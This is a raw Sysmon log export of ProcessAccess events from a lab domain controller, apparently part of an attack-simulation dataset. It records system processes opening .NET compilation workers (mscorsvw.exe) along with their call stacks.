10341000x80000000000000007881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.213{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920D-6005-8F03-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.213{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920D-6005-8F03-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.978{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920E-6005-9503-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.963{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920E-6005-9503-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.963{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920E-6005-9503-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920E-6005-9403-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.619{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920E-6005-9403-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.619{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920E-6005-9403-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.275{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920E-6005-9303-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.181{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920E-6005-9303-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.181{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920E-6005-9303-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.978{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-A003-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.978{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-A003-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.947{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9F03-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.947{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9F03-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.947{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9F03-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.885{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9E03-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.869{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9E03-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.869{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9E03-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9D03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.806{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9D03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.806{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9D03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.603{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9C03-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 